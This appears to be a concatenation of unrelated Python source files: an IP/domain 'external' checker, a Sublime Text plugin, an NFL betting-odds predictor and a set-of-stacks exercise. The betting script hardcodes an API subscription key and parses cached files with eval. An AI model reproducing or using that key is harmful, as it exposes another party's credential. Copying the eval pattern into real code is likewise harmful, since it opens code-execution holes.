    record = Flow_Games.query.filter_by(id=num).first()
    payload = json.dumps(record.game_board)
    return Response(payload, mimetype='application/json')
if __name__ == "__main__":
app.run()
|
""" Check domains, IPs, and hosts to ensure they are "external" """
import ipaddress
import publicsuffix2
__version__ = '1.0.1'
def is_external_address(addr):
    """Return True when *addr* is a publically routable ("external") IP.

    Mirrors the ``ipaddress`` ``is_global`` property, except that an IPv6
    address carrying a mapped IPv4 address is judged by its IPv4 part.
    Accepts anything ``ipaddress.ip_address`` accepts, or an already-parsed
    address object.

    Examples:

        >>> is_external_address('8.8.8.8')
        True
        >>> is_external_address('127.0.1.1')
        False
        >>> is_external_address('::ffff:127.0.0.1')
        False
        >>> is_external_address('::ffff:8.8.8.8')
        True
    """
    if not isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
        addr = ipaddress.ip_address(addr)
    # IPv4-mapped IPv6 (::ffff:a.b.c.d): classify by the embedded IPv4.
    # IPv4Address has no ipv4_mapped attribute, hence the default.
    mapped = getattr(addr, 'ipv4_mapped', None)
    if mapped is not None:
        addr = mapped
    return addr.is_global
_PSL = None  # lazily-built PublicSuffixList, shared across calls


def is_external_domain(domain):
    """Return True when *domain* is a child of a known public suffix.

    An external domain is any name whose last label is a public suffix.

    Examples:

        >>> is_external_domain('google.com')
        True
        >>> is_external_domain('localhost')
        False
        >>> is_external_domain('test.cluster.local')
        False
    """
    # Keep only the final label: 'a.b.example.com' -> 'com'; a single-label
    # name is its own candidate suffix.
    labels = domain.strip('.').rsplit('.', 1)
    suffix = labels[-1]
    global _PSL
    if _PSL is None:
        _PSL = publicsuffix2.PublicSuffixList()
    # NOTE(review): peeks at PublicSuffixList internals (``.root``) to test
    # top-level suffix membership — confirm against the publicsuffix2 API.
    try:
        _PSL.root[1][suffix]
    except KeyError:
        return False
    return True
def is_external_host(host):
    """Classify *host* as external via IP-reservation rules when it parses
    as an IP literal, otherwise via public-suffix domain rules.

    Examples:

        >>> is_external_host('google.com')
        True
        >>> is_external_host('8.8.8.8')
        True
        >>> is_external_host('localhost')
        False
        >>> is_external_host('192.168.100.2')
        False
    """
    try:
        ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: treat it as a domain name.
        return is_external_domain(host)
    return is_external_address(host)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = 'huangbinghe@gmail.com'
import sublime
import sublime_plugin
from collections import Counter
class MaxCountCommand(sublime_plugin.TextCommand):
    """Replace the whole buffer with its most frequent line, formatted
    "line:count".

    Fixes over the original: the unused settings load is gone, the filter
    iterator is materialised (the debug prints showed a one-shot
    ``<filter object>`` instead of the lines), and the noisy debug prints
    were removed.
    """

    def run(self, edit, without_empty_line=1):
        # Whole buffer content, split into lines.
        content = self.view.substr(sublime.Region(0, self.view.size()))
        lines = content.split('\n')
        if without_empty_line:
            lines = [line for line in lines if line]
        counts = Counter(lines)
        # most_common(1) -> [(line, count)]
        top_line, top_count = counts.most_common(1)[0]
        result = '{}:{}'.format(top_line, top_count)
        self.view.replace(edit, sublime.Region(0, self.view.size()), result)
class RepeatLinesCommand(sublime_plugin.TextCommand):
    """Replace the whole buffer with every line occurring at least
    ``repeat_count`` times, most frequent first, formatted "line:count".

    Fixes over the original: unused settings load and debug prints removed,
    filter materialised, and ``reverse=1`` replaced with the boolean it
    meant.
    """

    def run(self, edit, repeat_count=2, without_empty_line=1):
        content = self.view.substr(sublime.Region(0, self.view.size()))
        lines = content.split('\n')
        if without_empty_line:
            lines = [line for line in lines if line]
        counts = Counter(lines)
        repeated = [(text, count) for text, count in counts.items()
                    if count >= repeat_count]
        # Stable sort keeps Counter insertion order for equal counts.
        repeated.sort(key=lambda item: item[1], reverse=True)
        body = '\n'.join('{}:{}'.format(text, count) for text, count in repeated)
        self.view.replace(edit, sublime.Region(0, self.view.size()), body)
class MergeLinesCommand(sublime_plugin.TextCommand):
    """Zip blank-line-separated paragraphs together: row i of every
    paragraph is joined with commas onto one output line (rows beyond the
    shortest paragraph are dropped by ``zip``).

    Fixes over the original: unused settings load and debug prints removed;
    the fiddly manual paragraph-index bookkeeping is replaced by appending
    a new bucket on every blank line and filtering empties afterwards
    (identical grouping behaviour).
    """

    def run(self, edit):
        content = self.view.substr(sublime.Region(0, self.view.size()))
        paragraphs = [[]]
        for line in content.split('\n'):
            if line:
                paragraphs[-1].append(line)
            else:
                # Blank line: start a new paragraph bucket.
                paragraphs.append([])
        paragraphs = [p for p in paragraphs if p]
        merged = '\n'.join(','.join(row) for row in zip(*paragraphs))
        self.view.replace(edit, sublime.Region(0, self.view.size()), merged)
from urllib import request
from bs4 import BeautifulSoup
import json
from pprint import pprint
from scipy import stats
from utils import truncate
#############
### Setup ###
#############
# The 32 NFL team abbreviations; sorted below so list indices line up with
# the ordering used by the cached stats/rankings files read elsewhere here.
teams = ['SF', 'CHI', 'CIN', 'BUF', 'DEN', 'CLE', 'TB', 'ARI',
         'SD', 'KC', 'IND', 'DAL', 'MIA', 'PHI', 'ATL', 'NYG',
         'JAX', 'NYJ', 'DET', 'GB', 'CAR', 'NE', 'OAK', 'STL',
         'BAL', 'WAS', 'NO', 'SEA', 'PIT', 'HOU', 'TEN', 'MIN']
teams.sort()
# SECURITY(review): API key committed to source — rotate it and load from the
# environment. The two url_form_* examples below embed the same key.
api_key = 'b7d211fd970143a2940d9905fe5c2447'
url_form_stats = 'http://api.nfldata.apiphany.com/trial/json/TeamSeasonStats/2013?subscription-key=b7d211fd970143a2940d9905fe5c2447'
url_form_sched = 'http://api.nfldata.apiphany.com/trial/json/Schedules/2015?subscription-key=b7d211fd970143a2940d9905fe5c2447'
#################################
### Data Extraction Functions ###
#################################
## These functions extract the NFL team performance data from external API's and save them to local text files to
## avoid having to poing the API. The YEAR argument can be entered as an int and the TEAM argument can be entered
## as a string abbreviation as seen in the teams array in Setup. With much more experience now than at the time,
## I would add simple MongoDB integration as I worked in JSON format and extensively with dictionaries. This would
## also allow me to avoid using 'eval' which I now know is frowned upon.
def pullSeasonData(year):
    """Fetch season team stats for *year* from the API and cache them to
    NFLstatsYY.txt as a Python-literal string.

    Accepts the year as an int (e.g. 2015). The original concatenated the
    bare ``year`` into the URL while also computing ``year % 100``, so no
    single argument type could satisfy both; ``str(year)`` fixes that.
    The output file is now opened with ``with`` so it cannot leak.
    """
    url = ('http://api.nfldata.apiphany.com/trial/json/TeamSeasonStats/'
           + str(year) + '?subscription-key=' + api_key)
    with open("NFLstats" + str(year % 100).zfill(2) + ".txt", "w") as out:
        obj = request.urlopen(url)
        out.write(str(json.load(obj)))
def pullSeasonSchedule(year):
    """Fetch the season schedule for *year* from the API and cache it to
    NFLschedYY.txt as a Python-literal string.

    Accepts the year as an int. Same fixes as pullSeasonData: ``str(year)``
    in the URL (the original mixed string concatenation with ``year % 100``,
    so no argument type worked) and a ``with`` block for the output file.
    """
    url = ('http://api.nfldata.apiphany.com/trial/json/Schedules/'
           + str(year) + '?subscription-key=' + api_key)
    with open("NFLsched" + str(year % 100).zfill(2) + ".txt", "w") as out:
        obj = request.urlopen(url)
        out.write(str(json.load(obj)))
def getTeamSchedule(team, year):
    """Return *team*'s opponents for *year*, in schedule order, from the
    cached NFLschedYY.txt file written by pullSeasonSchedule.

    SECURITY(review): the cache is parsed with ``eval``; only run this
    against files produced by this program.
    The file is now opened read-only via ``with`` (the original used "r+"
    and leaked the handle on a parse failure).
    """
    with open("NFLsched" + str(year % 100).zfill(2) + ".txt", "r") as data_file:
        data = eval(data_file.read())
    schedule = []
    for game in data:
        if game["HomeTeam"] == team:
            schedule.append(str(game["AwayTeam"]))
        elif game["AwayTeam"] == team:
            schedule.append(str(game["HomeTeam"]))
    return schedule
def getLocationSchedule(team, year):
    """Return *team*'s home/away flags ('H'/'A') for *year*, in schedule
    order, from the cached NFLschedYY.txt file.

    The resulting list lines up index-for-index with getTeamSchedule.
    SECURITY(review): the cache is parsed with ``eval``; trusted files only.
    Opened read-only via ``with`` (the original used "r+" and leaked the
    handle on a parse failure).
    """
    with open("NFLsched" + str(year % 100).zfill(2) + ".txt", "r") as data_file:
        data = eval(data_file.read())
    location = []
    for game in data:
        if game["HomeTeam"] == team:
            location.append("H")
        elif game["AwayTeam"] == team:
            location.append("A")
    return location
#####################################
### Qualitative Factors Functions ###
#####################################
## The functions in this section look to use qualitative factors such as personnel changes, injuries,
## coaching changes, etc... to develop position group power rankings which are used to provide quantitative
## performance boosts or costs into the coming year. This is a way of translating last year's performance
## statistics into this year's projections.
def assignOffensiveRatings(year):
    """Score each team's offense from the qualitative position-group
    rankings in TeamRankingsYY.txt, weighted per ``scale`` (weights sum to
    100; rankings are presumably on a 1-5 scale — confirm with the file).

    SECURITY(review): the rankings file is parsed with ``eval``; trusted
    files only. Opened via ``with`` (the original used "r+" and leaked the
    handle on a parse failure). Per-component arithmetic is kept in the
    original order so the float sum and int truncation are bit-identical.
    """
    scale = {"Coaching": 25, "QB": 25, "O-Line": 20, "WR/TE": 15, "RB": 15}
    with open("TeamRankings" + str(year % 100).zfill(2) + ".txt", "r") as data_file:
        data = eval(data_file.read())
    offensiveRatings = {}
    for team in teams:
        rankings = data[teams.index(team)]
        coachingScore = ((rankings["Coaching"] / 5.0) * scale["Coaching"])
        qbScore = ((rankings["QB"] / 5.0) * scale["QB"])
        oLineScore = ((rankings["O-Line"] / 5.0) * scale["O-Line"])
        wrTeScore = ((rankings["WR/TE"] / 5.0) * scale["WR/TE"])
        rbScore = ((rankings["RB"] / 5.0) * scale["RB"])
        offensiveRatings[team] = int(coachingScore + qbScore + oLineScore + wrTeScore + rbScore)
    return offensiveRatings
def offensiveBoosts(prev_year, proj_year):
    """Fractional change in offensive rating between two seasons, per team.

    Positive means the offense is expected to improve going into
    ``proj_year``; values are (new - old) / 100.
    """
    previous = assignOffensiveRatings(prev_year)
    projected = assignOffensiveRatings(proj_year)
    return {team: (projected[team] - previous[team]) / 100.0 for team in teams}
# returns boosts in terms of positive or negative percent indicating an improvement or worsening of personnel/injuries
def assignDefensiveRatings(year):
    """Score each team's defense from the qualitative position-group
    rankings in TeamRankingsYY.txt, weighted per ``scale`` (weights sum to
    100; rankings are presumably on a 1-5 scale — confirm with the file).

    SECURITY(review): the rankings file is parsed with ``eval``; trusted
    files only. Opened via ``with`` (the original used "r+" and leaked the
    handle on a parse failure). Arithmetic kept in the original order.
    """
    scale = {"Coaching": 25, "Secondary": 25, "LB": 25, "D-Line": 25}
    with open("TeamRankings" + str(year % 100).zfill(2) + ".txt", "r") as data_file:
        data = eval(data_file.read())
    defensiveRatings = {}
    for team in teams:
        rankings = data[teams.index(team)]
        coachingScore = ((rankings["Coaching"] / 5.0) * scale["Coaching"])
        secondaryScore = ((rankings["Secondary"] / 5.0) * scale["Secondary"])
        lbScore = ((rankings["LB"] / 5.0) * scale["LB"])
        dLineScore = ((rankings["D-Line"] / 5.0) * scale["D-Line"])
        defensiveRatings[team] = int(coachingScore + secondaryScore + lbScore + dLineScore)
    return defensiveRatings
def defensiveBoosts(prev_year, proj_year):
    """Fractional change in defensive rating between two seasons, per team.

    Positive means the defense is expected to improve going into
    ``proj_year``; values are (new - old) / 100.
    """
    previous = assignDefensiveRatings(prev_year)
    projected = assignDefensiveRatings(proj_year)
    return {team: (projected[team] - previous[team]) / 100.0 for team in teams}
# returns boosts in terms of positive or negative percent indicating an improvement or worsening of personnel/injuries
######################################
### Quantitative Factors Functions ###
######################################
## Here we dive into the performance stats and develop a method to handicap games or, in other words, calculate
## the spreads which drive our probabilistic distributions. The primary stat used is YARDS PER POINT which can be
## used to calculate offensive and defensive efficiency. The qualitative rankings in the previous section go
## toward adjusting the YARDS PER POINT SPREAD based on perceived improvements or declines in qualitative
## performance metrics. The last function here lays out a method to calculate the PER GAME win probability for
## a mathchup using YPP Spreads.
def assignOffensiveYPP(year):
    """Offensive yards-per-point per team, from the prior season's cached
    stats, discounted by the qualitative offensive boost (lower is better:
    fewer yards needed per point scored).

    SECURITY(review): the stats file is parsed with ``eval``; trusted files
    only. Opened via ``with`` (the original leaked the handle on failure).
    """
    with open("NFLstats" + str((year - 1) % 100).zfill(2) + ".txt", "r") as stats_file:
        season_stats = eval(stats_file.read())
    boost = offensiveBoosts(year - 1, year)
    offensiveYPP = {}
    for team in teams:
        team_stats = season_stats[teams.index(team)]
        # +0.0 forces float division under Python 2 as well.
        ypp = (team_stats["OffensiveYards"] + 0.0) / team_stats["Score"]
        offensiveYPP[team] = round((1 - boost[team]) * ypp, 2)
    return offensiveYPP
def assignDefensiveYPP(year):
    """Defensive yards-per-point per team (yards allowed per point allowed),
    from the prior season's cached stats, inflated by the qualitative
    defensive boost (higher is better for a defense).

    SECURITY(review): the stats file is parsed with ``eval``; trusted files
    only. Opened via ``with`` (the original leaked the handle on failure).
    """
    with open("NFLstats" + str((year - 1) % 100).zfill(2) + ".txt", "r") as stats_file:
        season_stats = eval(stats_file.read())
    boost = defensiveBoosts(year - 1, year)
    defensiveYPP = {}
    for team in teams:
        team_stats = season_stats[teams.index(team)]
        ypp = (team_stats["OpponentOffensiveYards"] + 0.0) / team_stats["OpponentScore"]
        defensiveYPP[team] = round((1 + boost[team]) * ypp, 2)
    return defensiveYPP
def assignYPPspread(year):
    """Per-team spread between defensive and offensive yards-per-point;
    a larger value means a team scores more efficiently than it concedes.

    The original also read and ``eval``'d the whole NFLstats file into a
    ``stats`` variable it never used; that dead file read has been dropped.
    """
    offensiveYPP = assignOffensiveYPP(year)
    defensiveYPP = assignDefensiveYPP(year)
    return {team: round(defensiveYPP[team] - offensiveYPP[team], 2) for team in teams}
def gameWinProbability(year, team, opponent):
    """Win probability for *team* against *opponent* in *year*, rounded to
    two decimals.

    Home games get a +1.5 YPP edge, away games -1.5. getLocationSchedule
    only ever yields 'H' or 'A', so the else branch is the away case; the
    original's if/elif left ``line`` unbound for any other value.
    """
    YPPspread = assignYPPspread(year)
    schedule = getTeamSchedule(team, year)
    location = getLocationSchedule(team, year)
    edge = 1.5 if location[schedule.index(opponent)] == "H" else -1.5
    line = (YPPspread[team] - YPPspread[opponent]) + edge
    # Score margin modelled as Normal(line, 13); P(win) = P(margin > 0).
    distribution = stats.norm(line, 13)
    return round(1 - distribution.cdf(0), 2)
##################################################
### Vegas Odds/Lines Data Extraction Functions ###
##################################################
## This is another data extraction section. I use a custom built web scraper to collect Odds/Lines
## from Vegas Bookies. Web Scraping is a variable process involving trial and error so a large
## challenge is isolating the data you need and formatting it for efficienct use within the program.
## We do that here and then lastly, use the over/under odds data to calculate the implied probabilities
## Vegas is showing for teams finishing above/below the line (Vegas's expected win total).
def assignOdds(data):
    """Convert scraped odds rows into {team: [expected_wins, over, under]}.

    ``data`` rows arrive in the fixed order of ``teams_unsorted`` and are
    consumed from the front. Which columns hold the over/under odds depends
    on the row length (with one special case for the 'Chiefs' row), hence
    the branches; [:4] trims trailing junk off the odds tokens.
    """
    teams_unsorted = ['SF', 'CHI', 'CIN', 'BUF', 'DEN', 'CLE', 'TB', 'ARI',
                      'SD', 'KC', 'IND', 'DAL', 'MIA', 'PHI', 'ATL', 'NYG',
                      'JAX', 'NYJ', 'DET', 'GB', 'CAR', 'NE', 'OAK', 'STL',
                      'BAL', 'WAS', 'NO', 'SEA', 'PIT', 'HOU', 'TEN', 'MIN']
    team_info = {}
    for team in teams_unsorted:
        row = data.pop(0)
        if row[0] == 'Chiefs':
            team_info[team] = [float(row[1]), int(row[3][:4]), int(row[6][:4])]
        elif len(row) == 10:
            team_info[team] = [float(row[1]), int(row[4][:4]), int(row[6][:4])]
        elif len(row) == 11:
            team_info[team] = [float(row[1]), int(row[4][:4]), int(row[7][:4])]
    return team_info
def oddsScraper():
    """Scrape the Sporting News 2015 win-totals article and return the
    parsed odds via assignOdds().

    The odds text lives in the 5th paragraph of the article body, as
    newline-separated lines behind a <br> tag.
    """
    url = ("http://linemakers.sportingnews.com/article/4635972-nfl-win-totals-"
           "2015-season-vegas-odds-seahawks-patriots-cowboys-saints-broncos")
    page = request.urlopen(url).read()
    soup = BeautifulSoup(page, "html.parser")
    entry = soup.find_all('div', {'class': 'entry-content'})[0]
    paragraphs = entry.find_all('p')
    raw_text = paragraphs[4].find_all('br')[0].get_text()
    rows = [line.split(" ") for line in raw_text.split('\n') if line]
    return assignOdds(rows)
## Returned in format {team: [expectedWins, 'Over', 'Under']} ##
def vegasProbabilites(teamOdds):
    """Convert American over/under odds (indices 1 and 2 of each value)
    in-place into implied probabilities rounded to two decimals; the
    expected-wins entry (index 0) is left untouched. Returns the same dict.
    """
    def implied(odds):
        # Negative odds: risk |odds| to win 100; positive: risk 100 to win odds.
        if odds < 0:
            return round((-odds) / ((-odds) + 100.0), 2)
        return round(100.0 / (odds + 100), 2)

    for team in teamOdds:
        teamOdds[team][1] = implied(teamOdds[team][1])
        teamOdds[team][2] = implied(teamOdds[team][2])
    return teamOdds
######################
### Main Functions ###
######################
## This section is the real functionality of the program. We use our statistical spreads to calculate the
## win probabilite for every team in every game they play that year. We then sum up those probabilities,
## as dictated by the method of indicators, to determine the expected win total for each team in the coming
## year. Our per game scoring distribution is normal with mean derived from our YPP spreading technique, and
## standard deviation obtained through research into how games have unfolded in the past, namely through
## academic papers. Our next steps are to determine the probability of our expected win scenario occurring under
## the implied Vegas Distribition for win totals which we obtained in the last section. With these calculations,
## we can find the edge in certain bets and make recommendations on whether to take the over or under bet.
## Of note is that if our predicted win total and the Vegas predicted win total differs by less than 1.5 games,
## we conclude that there is no edge to be had in the bet. Recommendations are returned as a dict with all the
## relevant information.
def expectedWins(year):
    """Project each team's season win total by summing per-game win
    probabilities (method of indicators), rounded to a whole number of
    wins; BYE weeks contribute 0.
    """
    YPPspread = assignYPPspread(year)
    projected = {}
    for team in teams:
        schedule = getTeamSchedule(team, year)
        location = getLocationSchedule(team, year)
        win_probs = []
        for opponent in schedule:
            if opponent == "BYE":
                win_probs.append(0.0)
                continue
            # Home edge +1.5 YPP, away -1.5 (location holds only 'H'/'A').
            if location[schedule.index(opponent)] == "H":
                line = (YPPspread[team] - YPPspread[opponent]) + 1.5
            elif location[schedule.index(opponent)] == "A":
                line = (YPPspread[team] - YPPspread[opponent]) - 1.5
            # Score margin ~ Normal(line, 13); P(win) = P(margin > 0).
            win_probs.append(round(1 - stats.norm(line, 13).cdf(0), 2))
        projected[team] = int(round(sum(win_probs), 0))
    return projected
def compareProbabilities(year):
    """Pair our projected win totals with the probability Vegas' implied
    win distribution assigns to finishing under/over that projection.

    Vegas win totals are modelled as Normal(vegas_expectation, 2.5);
    ``truncate`` keeps two decimals without rounding.

    Returns:
        (comparison, teamWins) where comparison maps team ->
        [vegas_expected_wins, P(over our projection), P(under)].
    """
    ## Expectation of a normal random variable suggests 50/50 over/under probabilites ##
    teamWins = expectedWins(year)
    vegasImpliedProbs = vegasProbabilites(oddsScraper())
    comparison = {}
    for team in teamWins:
        vegas_mean = vegasImpliedProbs[team][0]
        vegas_dist = stats.norm(vegas_mean, 2.5)
        under_p = float(truncate(vegas_dist.cdf(teamWins[team]), 2))
        over_p = float(truncate(1 - under_p, 2))
        comparison[team] = [vegas_mean, over_p, under_p]
    return comparison, teamWins
def generalRecommendations(year):
    """Per-team betting recommendations.

    'Avoid' when our projection is within 1.5 wins of Vegas; otherwise
    'Over'/'Under' with the percentage edge versus a fair 50/50 split.
    A team whose over-probability is exactly 0.50 (and outside the 1.5-win
    band) matches no branch and is omitted, as in the original.
    """
    probs, wins = compareProbabilities(year)
    recommendations = {}
    for team in probs:
        vegas_wins = probs[team][0]
        entry = {"Algo Expected Wins": wins[team], "Vegas Wins": vegas_wins}
        if abs(vegas_wins - wins[team]) < 1.5:
            entry["Recommendation"] = "Avoid"
            entry["Edge"] = "Minimal/None"
            recommendations[team] = entry
        elif probs[team][1] < 0.50:
            entry["Recommendation"] = "Over"
            entry["Edge"] = truncate((probs[team][2] - 0.50) * 100, 2) + "%"
            recommendations[team] = entry
        elif probs[team][1] > 0.50:
            entry["Recommendation"] = "Under"
            entry["Edge"] = truncate((probs[team][1] - 0.50) * 100, 2) + "%"
            recommendations[team] = entry
    return recommendations
if __name__ == '__main__':
    # Entry point: prompt for a season and pretty-print the bet table.
    year = int(input("Enter current year to see betting recommendations: "))
    pprint(generalRecommendations(year), width=1)
## In this GitHUb demo, there is only support for the 2015 season. If you pip install the dependencies, run the program,
## and enter 2015, you should get the right bet predictions. Feel free to add to the code or make changes on a separate
## branch. This was my first ever actual functional Python Program. It was a lot of fun. Perhaps if I developed it now,
## with more experience under my belt it would look different. I would use OO design, database integration, and try to
## research into more advanced mathematica methods to make predictions. Current coaches examine stats on a rolling 4 week
## basis. I was thinking of turning this into a week to week betting app where stats over a rolling 4 week period are
## analyzed and bets are recommended through analysis of the most recent performance statistics.
|
from collections import deque
from typing import Deque
class SetOfStacks:
    """A stack that spills into a new internal stack once `capacity` is reached.

    Cracking the Coding Interview 3.3 ("Stack of Plates"): behaves like one
    stack from the outside, but is backed by a list of deques, each holding
    at most `capacity` elements. The last deque is the active (top) stack.
    """

    def __init__(self, capacity):
        # List of deques; grows/shrinks as stacks fill up or empty out.
        self.set_of_stacks = []
        self.capacity = capacity

    def getLastStack(self):
        """Return the active (last) stack, or a fresh empty deque if none exist."""
        # Use collections.deque directly: calling typing.Deque() as a
        # constructor is deprecated alias instantiation.
        return self.set_of_stacks[-1] if self.set_of_stacks else deque()

    def push(self, data):
        """Push `data`, opening a new internal stack when the current one is full."""
        current_stack = self.getLastStack()
        if self.set_of_stacks and len(current_stack) < self.capacity:
            current_stack.append(data)
        else:
            # Current stack is full (or no stacks exist yet): start a new one.
            current_stack = deque()
            self.set_of_stacks.append(current_stack)
            current_stack.append(data)

    def pop(self):
        """Pop from the active stack; reports underflow and returns None when empty."""
        if not self.set_of_stacks:
            print("Stack Underflow!")
            return
        current_stack = self.getLastStack()
        popped_element = current_stack.pop()
        if not current_stack:
            # Drop the now-empty stack so the previous one becomes active.
            self.set_of_stacks.pop()
        return popped_element

    def popAt(self, index):
        """Pop from the stack at `index`, rolling later elements left to refill it.

        Each later stack's bottom element shifts to the top of the stack
        before it, so every stack except the last stays at full capacity.
        Returns None (after reporting underflow) when no stacks exist.
        """
        if not self.set_of_stacks:
            # Mirror pop()'s graceful underflow instead of raising IndexError.
            print("Stack Underflow!")
            return
        # Compare positions, not contents: `==` on deques is value equality,
        # so two distinct stacks with equal contents would misroute to pop()
        # and remove an element from the wrong stack.
        if index == len(self.set_of_stacks) - 1:
            return self.pop()
        popped_element = self.set_of_stacks[index].pop()
        for pointer in range(index + 1, len(self.set_of_stacks)):
            rollover_element = self.set_of_stacks[pointer].popleft()
            self.set_of_stacks[pointer - 1].append(rollover_element)
        if not self.getLastStack():
            self.set_of_stacks.pop()
        return popped_element
# Demo: exercise SetOfStacks with a per-stack capacity of 3.
StackOfPlates = SetOfStacks(3)

# Popping the empty structure just reports underflow.
StackOfPlates.pop()
print(StackOfPlates.set_of_stacks)

# Seven pushes spill across three internal stacks (3 + 3 + 1),
# printing the structure after each push.
for value in (10, 20, 30, 40, 50, 60, 70):
    StackOfPlates.push(value)
    print(StackOfPlates.set_of_stacks)

# Pop from the first internal stack; later stacks roll elements left.
StackOfPlates.popAt(0)
print(StackOfPlates.set_of_stacks)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.